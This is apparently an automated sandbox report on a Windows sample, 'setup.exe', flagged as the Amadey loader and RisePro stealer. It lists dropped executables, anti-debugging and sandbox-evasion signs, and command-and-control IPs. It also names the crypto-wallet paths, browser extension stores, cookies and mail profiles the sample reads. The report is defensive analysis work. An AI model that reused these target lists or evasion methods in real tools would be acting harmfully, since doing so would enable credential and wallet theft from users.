Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161323 mov eax, dword ptr fs:[00000030h] 9_2_0A161323
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161721 mov eax, dword ptr fs:[00000030h] 9_2_0A161721
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161528 mov eax, dword ptr fs:[00000030h] 9_2_0A161528
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160952 mov eax, dword ptr fs:[00000030h] 9_2_0A160952
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161551 mov eax, dword ptr fs:[00000030h] 9_2_0A161551
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16195F mov eax, dword ptr fs:[00000030h] 9_2_0A16195F
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160746 mov eax, dword ptr fs:[00000030h] 9_2_0A160746
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161745 mov eax, dword ptr fs:[00000030h] 9_2_0A161745
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161941 mov eax, dword ptr fs:[00000030h] 9_2_0A161941
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161348 mov eax, dword ptr fs:[00000030h] 9_2_0A161348
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A160B75 mov eax, dword ptr fs:[00000030h] 9_2_0A160B75
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161972 mov eax, dword ptr fs:[00000030h] 9_2_0A161972
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16077E mov eax, dword ptr fs:[00000030h] 9_2_0A16077E
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16197F mov eax, dword ptr fs:[00000030h] 9_2_0A16197F
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16137C mov eax, dword ptr fs:[00000030h] 9_2_0A16137C
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16177D mov eax, dword ptr fs:[00000030h] 9_2_0A16177D
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16096F mov eax, dword ptr fs:[00000030h] 9_2_0A16096F
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16156A mov eax, dword ptr fs:[00000030h] 9_2_0A16156A
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16079E mov eax, dword ptr fs:[00000030h] 9_2_0A16079E
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161398 mov eax, dword ptr fs:[00000030h] 9_2_0A161398
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A161799 mov eax, dword ptr fs:[00000030h] 9_2_0A161799
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16098E mov eax, dword ptr fs:[00000030h] 9_2_0A16098E
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16138C mov eax, dword ptr fs:[00000030h] 9_2_0A16138C
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A16158C mov eax, dword ptr fs:[00000030h] 9_2_0A16158C
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1609B5 mov eax, dword ptr fs:[00000030h] 9_2_0A1609B5
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1615B0 mov eax, dword ptr fs:[00000030h] 9_2_0A1615B0
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1613B1 mov eax, dword ptr fs:[00000030h] 9_2_0A1613B1
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1619A3 mov eax, dword ptr fs:[00000030h] 9_2_0A1619A3
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1619A9 mov eax, dword ptr fs:[00000030h] 9_2_0A1619A9
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1619D1 mov eax, dword ptr fs:[00000030h] 9_2_0A1619D1
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1607DC mov eax, dword ptr fs:[00000030h] 9_2_0A1607DC
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1617D9 mov eax, dword ptr fs:[00000030h] 9_2_0A1617D9
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1609F3 mov eax, dword ptr fs:[00000030h] 9_2_0A1609F3
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1615F3 mov eax, dword ptr fs:[00000030h] 9_2_0A1615F3
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1613FD mov eax, dword ptr fs:[00000030h] 9_2_0A1613FD
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1619E7 mov eax, dword ptr fs:[00000030h] 9_2_0A1619E7
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Code function: 9_2_0A1613EF mov eax, dword ptr fs:[00000030h] 9_2_0A1613EF
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E46D80 mov eax, dword ptr fs:[00000030h] 27_2_00E46D80
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E13F40 mov eax, dword ptr fs:[00000030h] 27_2_00E13F40
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\1000015002\b6042db502.exe "C:\Users\user\1000015002\b6042db502.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe "C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe "C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe" Jump to behavior
Source: C:\Users\user\1000015002\b6042db502.exe Process created: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe "C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account Jump to behavior
Source: 8bcaec3fef.exe, 00000009.00000002.2559987207.00000000004C2000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: b6042db502.exe, b6042db502.exe, 00000005.00000002.2220720292.0000000000E2D000.00000040.00000001.01000000.00000009.sdmp, axplong.exe, 0000001C.00000002.2715569843.00000000002CD000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: vProgram Manager
Source: RageMP131.exe Binary or memory string: &!Program Manager
Source: RageMP131.exe, 0000001B.00000002.6958219757.0000000001098000.00000040.00000001.01000000.00000011.sdmp Binary or memory string: !Program Manager
Source: setup.exe, setup.exe, 00000000.00000002.2077796101.000000000035C000.00000040.00000001.01000000.00000003.sdmp, explortu.exe, explortu.exe, 00000003.00000002.2116153169.000000000076C000.00000040.00000001.01000000.00000007.sdmp, explortu.exe, 0000001D.00000002.2715567444.000000000076C000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: OProgram Manager
Source: 8bcaec3fef.exe, 8bcaec3fef.exe, 00000009.00000002.2560316369.00000000006A3000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: )Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\1000015002\b6042db502.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\1000015002\b6042db502.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\8bcaec3fef.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E5FF00 RegOpenKeyExA,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,GetSystemInfo,GlobalMemoryStatusEx,CreateToolhelp32Snapshot,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA, 27_2_00E5FF00
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Code function: 27_2_00E5FF00 RegOpenKeyExA,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,GetSystemInfo,GlobalMemoryStatusEx,CreateToolhelp32Snapshot,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA, 27_2_00E5FF00
Source: C:\Users\user\AppData\Local\Temp\1000016001\eaa97795e9.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 0.2.setup.exe.170000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explortu.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.explortu.exe.580000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.b6042db502.exe.c30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.axplong.exe.d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.2075796415.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2037119339.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2180141513.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2674508535.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2074612089.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2715350371.00000000000D1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2220567751.0000000000C31000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2116024182.0000000000581000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2077719831.0000000000171000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.2221998730.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2715346038.0000000000581000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.2674528810.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected RisePro Stealer
Source: Yara match File source: 0000001B.00000002.6959624442.0000000001540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 8896, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: RageMP131.exe, 0000001B.00000002.6959624442.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets8b}
Source: RageMP131.exe, 0000001B.00000002.6959624442.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\walletse
Source: RageMP131.exe, 0000001B.00000003.6775201198.0000000007F50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx
Source: RageMP131.exe, 0000001B.00000002.6959624442.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletCC}
Source: RageMP131.exe, 0000001B.00000002.6959624442.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets*c
Source: RageMP131.exe, 0000001B.00000002.6959624442.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.walletCC}
Source: RageMP131.exe, 0000001B.00000002.6959624442.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json@
Source: RageMP131.exe, 0000001B.00000002.6959624442.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets*c
Source: RageMP131.exe, 0000001B.00000002.6959624442.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: RageMP131.exe, 0000001B.00000003.6775201198.0000000007F50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*l
Source: RageMP131.exe, 0000001B.00000002.6959010221.0000000001527000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_hnfanknocfeofbddgcijnmhnfnkdnaad_0.indexeddb.leveldb\CURRENT
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 8896, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected RisePro Stealer
Source: Yara match File source: 0000001B.00000002.6959624442.0000000001540000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.6959010221.00000000014D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 8896, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1460137 Sample: setup.exe Startdate: 20/06/2024 Architecture: WINDOWS Score: 100 75 ipinfo.io 2->75 77 db-ip.com 2->77 101 Snort IDS alert for network traffic 2->101 103 Found malware configuration 2->103 105 Antivirus detection for dropped file 2->105 107 11 other signatures 2->107 10 setup.exe 5 2->10         started        14 RageMP131.exe 2->14         started        16 RageMP131.exe 2->16         started        18 7 other processes 2->18 signatures3 process4 file5 71 C:\Users\user\AppData\Local\...\explortu.exe, PE32 10->71 dropped 73 C:\Users\...\explortu.exe:Zone.Identifier, ASCII 10->73 dropped 145 Detected unpacking (changes PE section rights) 10->145 147 Tries to evade debugger and weak emulator (self modifying code) 10->147 149 Tries to detect virtualization through RDTSC time measurements 10->149 20 explortu.exe 1 23 10->20         started        151 Machine Learning detection for dropped file 14->151 153 Found stalling execution ending in API Sleep call 14->153 155 Hides threads from debuggers 14->155 157 Tries to steal Mail credentials (via file / registry access) 16->157 159 Found many strings related to Crypto-Wallets (likely being stolen) 16->159 161 Tries to harvest and steal browser information (history, passwords, etc) 16->161 163 Tries to detect sandboxes / dynamic malware analysis system (registry check) 18->163 165 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->165 signatures6 process7 dnsIp8 85 147.45.47.155, 49705, 49707, 49709 FREE-NET-ASFREEnetEU Russian Federation 20->85 87 77.91.77.81, 49706, 49708, 49710 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 20->87 57 C:\Users\user\AppData\...\8bcaec3fef.exe, PE32 20->57 dropped 59 C:\Users\user\AppData\...\eaa97795e9.exe, PE32 20->59 dropped 61 C:\Users\user\AppData\Local\...\sarra[1].exe, PE32 20->61 dropped 63 4 other malicious files 20->63 dropped 117 Antivirus detection for dropped file 20->117 119 Multi AV Scanner detection for dropped file 20->119 121 Detected unpacking (changes PE section rights) 20->121 123 7 other signatures 20->123 25 b6042db502.exe 4 20->25         started        29 eaa97795e9.exe 1 7 20->29         started        32 8bcaec3fef.exe 1 20->32         started        34 explortu.exe 20->34         started        file9 signatures10 process11 dnsIp12 65 C:\Users\user\AppData\Local\...\axplong.exe, PE32 25->65 dropped 125 Antivirus detection for dropped file 25->125 127 Detected unpacking (changes PE section rights) 25->127 129 Machine Learning detection for dropped file 25->129 143 2 other signatures 25->143 36 axplong.exe 12 25->36         started        95 77.91.77.66, 49726, 49749, 49750 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 29->95 97 ipinfo.io 34.117.186.192, 443, 49796, 49808 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 29->97 99 db-ip.com 104.26.5.15, 443, 49798, 49812 CLOUDFLARENETUS United States 29->99 67 C:\Users\user\AppData\Local\...\RageMP131.exe, PE32 29->67 dropped 69 C:\ProgramData\MPGPH131\MPGPH131.exe, PE32 29->69 dropped 